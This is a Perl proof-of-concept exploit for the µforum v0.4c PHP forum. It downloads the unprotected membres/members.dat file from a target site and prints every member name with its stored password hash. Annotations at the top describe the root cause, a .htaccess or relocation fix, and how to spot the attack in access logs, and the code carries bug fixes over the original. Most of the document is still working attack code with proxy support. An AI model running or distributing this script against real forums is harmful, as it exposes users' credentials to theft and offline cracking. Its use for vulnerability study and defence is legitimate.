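#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file not protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
# Reviewer notes (defensive reading of this PoC):
#   Root cause : the forum keeps member records, including password values,
#                in membres/members.dat under the web root, and nothing stops
#                the web server from serving that file to any client.
#   Mitigation : deny HTTP access to the membres/ data files (for Apache, an
#                .htaccess with "Require all denied" on 2.4 or "Deny from all"
#                on 2.2), or move the data file outside the document root.
#                Treat every stored password as exposed and reset them.
#   Detection  : look in access logs for GET requests to
#                <forum path>/membres/members.dat answered with a 200; this
#                script sends the bare User-Agent string "Mozilla".
#
use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long;

# Banner; the horizontal rule is reused by the usage text.
my $rule = '+' . ('-' x 53) . "+\n";
print STDOUT "\n", $rule;
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT $rule;

# Prints the usage box and exits with status 1.
sub _usage {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT $rule;
    exit(1);
}

my ($host, $path, $proxh, $proxu, $proxp);
my $parsed_ok = GetOptions(
    'host=s'  => \$host,
    'path=s'  => \$path,
    'proxh=s' => \$proxh,
    'proxu=s' => \$proxu,
    'proxp=s' => \$proxp,
);

# The original ignored GetOptions' return value; an unknown or malformed
# option now ends in the usage text instead of being silently dropped.
_usage() if !$parsed_ok || !$host;

$path = '/' if !$path;

# Build the URL of the data file. The scheme test is anchored: the original
# /http/ matched anywhere in the string, so a host or path that merely
# contained "http" was left without a scheme.
my $url = $host . $path . 'membres/members.dat';
$url = 'http://' . $url if $url !~ m{\Ahttps?://}i;

my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;

# The request object has to exist before the proxy credentials are attached.
# The original called proxy_authorization_basic() on a still-undefined $req,
# which dies whenever --proxp is given.
my $request = GET $url;
$request->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $response = $ua->request($request);

# Do not parse an error page as if it were the data file.
if (!$response->is_success) {
    print STDERR 'Request failed: ', $response->status_line, "\n";
    exit(1);
}

# The file is split on ':' and each piece is matched against two patterns.
# NOTE(review): the ";a" / ";i" suffixes look like PHP serialize() output,
# and the 32-character [a-z0-9] value is presumably an unsalted hex digest
# (MD5 length) -- confirm against the forum source. If so, the stored values
# are cheap to attack offline once the file has been read.
for my $piece (split /:/, $response->content) {
    if ($piece =~ /"(.*)";a/) {
        print STDOUT "\n" . $1 . '::';    # member name opens a new output line
    }
    if ($piece =~ /"([a-z0-9]{32})";i/) {
        print STDOUT $1;                  # stored password value for that member
    }
}

print "\n";
exit(0);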